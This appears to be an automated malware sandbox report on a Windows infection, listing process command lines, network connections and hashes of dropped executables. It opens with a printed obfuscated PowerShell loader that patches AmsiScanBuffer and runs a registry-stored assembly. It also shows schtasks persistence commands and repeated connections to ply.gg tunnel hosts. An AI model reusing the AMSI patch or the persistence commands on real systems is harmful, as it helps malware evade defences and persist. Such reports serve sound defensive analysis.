'+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$WGsEYNoUdYPSzUBII=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$tIBwnIt,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$QoXaWUPNlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oykFIuICiuCOVfliw,$nzNlFJJjmdIMbKrTNexeWA).Invoke($WGsEYNoUdYPSzUBII,[uint32]8,4,[ref]$QoXaWUPNlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WGsEYNoUdYPSzUBII,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oykFIuICiuCOVfliw,$nzNlFJJjmdIMbKrTNexeWA).Invoke($WGsEYNoUdYPSzUBII,[uint32]8,0x20,[ref]$QoXaWUPNlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+'7'+'7s'+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Users\Admin\AppData\Roaming\svvhost.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{7dd393c1-6aab-4696-9d80-7741ae4f0c47}

C:\Users\Admin\yar.exe

"C:\Users\Admin\yar.exe"

C:\Users\Admin\sachost.exe

"C:\Users\Admin\sachost.exe"

C:\Users\Admin\penisware.exe

"C:\Users\Admin\penisware.exe"

C:\Users\Admin\penisballs.exe

"C:\Users\Admin\penisballs.exe"

C:\Users\Admin\physics.exe

"C:\Users\Admin\physics.exe"

C:\Users\Admin\calc.exe

"C:\Users\Admin\calc.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 456 -p 3296 -ip 3296

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3296 -s 508

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.0.1571581372\1476419891" -parentBuildID 20221007134813 -prefsHandle 1864 -prefMapHandle 1856 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0e81da7-9ca2-4d71-887d-a5ef14a84881} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 1944 27d776d7b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.1.1518298457\657006121" -parentBuildID 20221007134813 -prefsHandle 2312 -prefMapHandle 2308 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f55e3891-880c-419a-b64f-b2885ad826a3} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2344 27d77245c58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.2.2022740486\1688792288" -childID 1 -isForBrowser -prefsHandle 3012 -prefMapHandle 3200 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb9ad5ef-b656-47b3-b4d9-af5b5ef6c8e6} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3232 27d7765c358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.3.216660227\1109609678" -childID 2 -isForBrowser -prefsHandle 3492 -prefMapHandle 3512 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e00775e1-32a4-4d35-9da0-d1754d72708d} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3532 27d79cf3058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.4.1359970116\1643841891" -childID 3 -isForBrowser -prefsHandle 3760 -prefMapHandle 3704 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9859021-b126-49fb-beeb-7ee6f7ce0270} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3772 27d79b7d258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.5.2100969568\646837057" -childID 4 -isForBrowser -prefsHandle 4936 -prefMapHandle 4952 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9342e130-22af-4a3a-bed5-febb351a7134} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 4932 27d63b6ab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.6.1878075749\761246163" -childID 5 -isForBrowser -prefsHandle 4960 -prefMapHandle 4956 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10aa32d8-ed96-4486-bb96-3497cbc43854} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2808 27d7d925558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.7.794327305\550752595" -childID 6 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7499bac-cd39-45d3-b2c8-8affa8bd7530} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 5292 27d7d926158 tab

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 201.238.32.23.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 recte.host udp
US 104.21.23.17:443 recte.host tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 17.23.21.104.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 104.21.23.17:443 recte.host tcp
US 104.21.23.17:443 recte.host tcp
US 104.21.23.17:443 recte.host tcp
US 104.21.23.17:443 recte.host tcp
US 147.185.221.19:25944 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:38630 tcp
US 104.21.23.17:443 recte.host tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 104.21.23.17:443 recte.host tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 teen-modes.gl.at.ply.gg udp
US 147.185.221.19:23638 teen-modes.gl.at.ply.gg tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 politics-fiber.gl.at.ply.gg udp
US 147.185.221.19:47430 politics-fiber.gl.at.ply.gg tcp
US 13.107.253.67:443 tcp
US 147.185.221.19:25944 politics-fiber.gl.at.ply.gg tcp
US 147.185.221.19:42571 politics-fiber.gl.at.ply.gg tcp
US 147.185.221.19:38630 politics-fiber.gl.at.ply.gg tcp
US 8.8.8.8:53 san-periods.gl.at.ply.gg udp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:23638 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:42571 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:42571 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 push.services.mozilla.com udp
US 44.237.98.207:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 207.98.237.44.in-addr.arpa udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 73.239.69.13.in-addr.arpa udp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.42:443 chromewebstore.googleapis.com tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 ciscobinary.openh264.org udp
FR 23.200.87.12:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 12.87.200.23.in-addr.arpa udp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigl6ney.gvt1.com udp
GB 173.194.183.169:443 r4.sn-aigl6ney.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigl6ney.gvt1.com udp
GB 173.194.183.169:443 r4.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 169.183.194.173.in-addr.arpa udp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp

Files

memory/4284-0-0x0000000074ADE000-0x0000000074ADF000-memory.dmp

memory/4284-1-0x0000000000440000-0x0000000000466000-memory.dmp

C:\Users\Admin\yar.exe

MD5 9e8baf127b832943d4fae218ce90191a
SHA1 449e6f1c2c79cb0ee4d43151bcaa6ecfd38efa70
SHA256 fbbb58d64ed3d52ebf0c4442588f4a19e48fd64023188fb750926b13c40df8a0
SHA512 9af9e3e30c34ecad41277c0bb8e27eabaf7fa05249153ffac20262af4ed3680a5a85cc5c192b04b3da3835396ef68e4e4a8b9123c663d8cf2f3a8681db7f8114

memory/5040-5-0x00007FFFD63F3000-0x00007FFFD63F5000-memory.dmp

memory/5040-6-0x0000000000990000-0x00000000009C8000-memory.dmp

memory/5040-7-0x0000000002B20000-0x0000000002B26000-memory.dmp

C:\Users\Admin\sachost.exe

MD5 7a9290dfef391b53b114a8ddea1a7675
SHA1 b6a0047be861becb45d8868beffafb1216f6243a
SHA256 33b848f9b1ea8ec2f27da181512df79d9e65e2e8c814f1df29945d19d60708dc
SHA512 9a7f349698014256e950a81f42b9c9b20d25312a7310e914f9cebc553e872d23f1d14d802c656cde4867f93e1621e999f3a283ce01263fa567f2e41a36185d49

memory/4632-11-0x0000000000DE0000-0x0000000000E26000-memory.dmp

memory/4632-12-0x00000000015C0000-0x00000000015C6000-memory.dmp

C:\Users\Admin\penisware.exe

MD5 69d8b4e23e8772c8509e2f2d96d13d1e
SHA1 c29c85bd8c58b6b9aa3266763b3c5358d402d6ba
SHA256 c8bd8c0e90372507183037207e67c54129f7eec6a3596ff26cf13cee98dd865b
SHA512 7a5e39123f08c2bf521dbb31bd4c1ddb1a94d7dba26c31138ca071dc6d589dcf960e9e5cd691723703ab9939cf1abe73ef33b201019c8140d339ee7bcb1b4e6c

memory/2276-17-0x0000000000DC0000-0x0000000000DF6000-memory.dmp

memory/2276-18-0x0000000002E50000-0x0000000002E56000-memory.dmp

C:\Users\Admin\penisballs.exe

MD5 18f497deffe88b6b2cff336a277aface
SHA1 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA256 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA512 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

memory/5108-22-0x0000000000690000-0x00000000006D6000-memory.dmp

memory/5108-23-0x0000000002740000-0x0000000002746000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

C:\Users\Admin\physics.exe

MD5 7849154210d0e788d25f4f195438c765
SHA1 93018c5de438c48a4d890071352b60b81952fe17
SHA256 8ba1d2d467e3d78a65a238e592a81d6a518737bc077e39dd162cffc76ee18441
SHA512 bdc70b6615c794c222eb8f5004f0ed5a78062c282f8938556b514bf77bab79724a3a6a621672ba2d97fbbf1567bdc249ab6adb918ae5f2945e45b5d32f85a1d2

memory/3880-28-0x0000000000A20000-0x0000000000A66000-memory.dmp

memory/3880-29-0x0000000001210000-0x0000000001216000-memory.dmp

C:\Users\Admin\calc.exe

MD5 8cc75bff0675c5c55483b206666b9dd3
SHA1 218198bfd494e31db303e55d41c110564835f0e3
SHA256 1a7b62006c6db37c873401724d0303fc789f2422bc7c1878f6dd5379f340d607
SHA512 0a6930caacdbf2003b29a12b0e8db682223800f285b1b8428cf29d00439d7ab7299d96dde9ae12e2121be1f6b4bb10a7a1477e759457ef7c85650784cc911879

memory/4136-37-0x0000000000590000-0x00000000005A0000-memory.dmp

C:\Users\Admin\install.exe

MD5 1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256 b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

C:\Windows\Temp\__PSScriptPolicyTest_f3o103k1.q4v.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3068-51-0x000001FF454D0000-0x000001FF454F2000-memory.dmp

memory/3068-53-0x000001FF45880000-0x000001FF458AA000-memory.dmp

memory/3068-55-0x00007FFFF5DE0000-0x00007FFFF5E9E000-memory.dmp

memory/3068-54-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp

memory/3012-61-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3012-59-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3012-58-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3012-57-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3012-56-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3012-65-0x00007FFFF5DE0000-0x00007FFFF5E9E000-memory.dmp

memory/3012-64-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp

memory/3068-66-0x000001FF45500000-0x000001FF4564E000-memory.dmp

memory/632-71-0x00000179AA250000-0x00000179AA27B000-memory.dmp

memory/688-90-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp

memory/688-83-0x0000022D3C4F0000-0x0000022D3C51B000-memory.dmp

memory/380-105-0x0000022757B10000-0x0000022757B3B000-memory.dmp

memory/396-116-0x000002784A170000-0x000002784A19B000-memory.dmp

memory/380-112-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp

memory/380-111-0x0000022757B10000-0x0000022757B3B000-memory.dmp

memory/976-101-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp

memory/976-100-0x00000204B25A0000-0x00000204B25CB000-memory.dmp

memory/976-94-0x00000204B25A0000-0x00000204B25CB000-memory.dmp

memory/632-79-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp

memory/632-78-0x00000179AA250000-0x00000179AA27B000-memory.dmp

memory/632-72-0x00000179AA250000-0x00000179AA27B000-memory.dmp

memory/632-70-0x00000179AA1F0000-0x00000179AA215000-memory.dmp

memory/688-89-0x0000022D3C4F0000-0x0000022D3C51B000-memory.dmp

memory/3012-67-0x0000000140000000-0x0000000140008000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
